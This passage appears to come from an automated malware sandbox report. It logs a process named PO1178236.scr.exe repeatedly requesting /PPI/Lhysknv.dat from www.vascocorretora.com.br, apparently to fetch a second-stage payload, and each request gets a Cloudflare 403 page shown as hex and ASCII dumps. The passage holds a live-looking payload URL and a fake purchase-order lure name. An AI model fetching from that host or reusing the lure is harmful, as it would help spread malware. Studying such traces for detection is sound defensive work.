        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oyEnw7q9Ww0AfmqFh%2BVsQGzgzQBWk7Jli%2Fr%2BMt%2BwLJBwXPzeVekLqnhMe6u8l7i30WHR1kSF0hL5GD5jw9X1mwa281JEKyYZYhCXHNeD8h0DHFGI5l7IAT005Mx0rVIbZLgKV3%2BDuK57JxPU"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c14cdecc7d24-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1963&min_rtt=1958&rtt_var=745&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1457085&cwnd=193&unsent_bytes=0&cid=29d6510b74dd0171&ts=134&x=0"
        2025-01-09 07:36:13 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:13 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
        2025-01-09 07:36:13 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:36:13 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 34 63 64 65 63 63 37 64 32 34 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c14cdecc7d24</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:36:13 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 34 63 64 65 63 63 37 64 32 34 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 33 4d 79 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c14cdecc7d24',t:'MTczNjQwODE3My4wMDAwMDA='};v
        2025-01-09 07:36:13 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        29192.168.2.949737188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:14 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:14 UTC1013INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:14 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:29 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7C62SOx4k%2FV0jiTkmctHUym91WtucxDZfmyRFSnZj%2FWoPbxrJ%2FAcG9xqxjCCdFZ3MBo69L79kt2%2Fn%2BvT6Au2oSxQk2lqt2Od8hc0poUL90AL6p2FlSr5PLJlI9avaEAbzQrt4BgDdN7%2F%2F5tV"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1508f4d8c96-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1953&min_rtt=1949&rtt_var=739&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1473259&cwnd=188&unsent_bytes=0&cid=1ef5691b89df0441&ts=140&x=0"
        2025-01-09 07:36:14 UTC356INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:14 UTC1369INData Raw: 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
        Data Ascii: Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="wi
        2025-01-09 07:36:14 UTC1369INData Raw: 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d
        Data Ascii: ection cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>...
        2025-01-09 07:36:14 UTC1369INData Raw: 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 35 30 38 66 34 64 38 63 39 36 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a
        Data Ascii: m:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1508f4d8c96</strong></span> <span class="cf-footer-separator sm:
        2025-01-09 07:36:14 UTC1006INData Raw: 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 35 30 38 66 34 64 38 63 39 36 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 33 4e 43 34 77 4d 44 41 77 4d 44 41 3d
        Data Ascii: > window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1508f4d8c96',t:'MTczNjQwODE3NC4wMDAwMDA=
        2025-01-09 07:36:14 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        30192.168.2.949738188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:14 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:14 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:14 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:29 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IdXJYABxfhPW%2FxwVPTV8tRippZValYUhBkRr76Vo0ccX2PZyw%2FRl3iA9biTI%2BOcjZEWAXoo2xLMmnSCy3A6NNiedfekHQ1kPRHr7LRrOBygp%2B0Q8mSBRDo8T6ERPcLBNKIlTbDKmRE8AjwwH"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1545ce642e7-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1720&min_rtt=1715&rtt_var=654&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1660034&cwnd=242&unsent_bytes=0&cid=b2d941996a3f8d42&ts=134&x=0"
        2025-01-09 07:36:14 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:14 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
        2025-01-09 07:36:14 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:36:14 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 35 34 35 63 65 36 34 32 65 37 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1545ce642e7</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:36:14 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 35 34 35 63 65 36 34 32 65 37 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 33 4e 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1545ce642e7',t:'MTczNjQwODE3NC4wMDAwMDA='};var
        2025-01-09 07:36:14 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        31192.168.2.949739188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:15 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:15 UTC1021INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:15 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:30 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rRq5yOWx5U7Ip%2FOXF1BRkq%2BdThW%2F8enMXvdG8k3BSj0u4mpHRWejX%2Batqi3%2BvtdN4SrPIo0CE%2BJ2J5Rrgub9y911rXk%2F26miV3pxpKzC%2B2oRtf%2BGnWkVrhQC5K%2F3tNVFp%2FHBtwvVpsdsvsYl"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1583de0c448-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1581&rtt_var=611&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1766485&cwnd=230&unsent_bytes=0&cid=773cf42083276f0f&ts=156&x=0"
        2025-01-09 07:36:15 UTC348INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
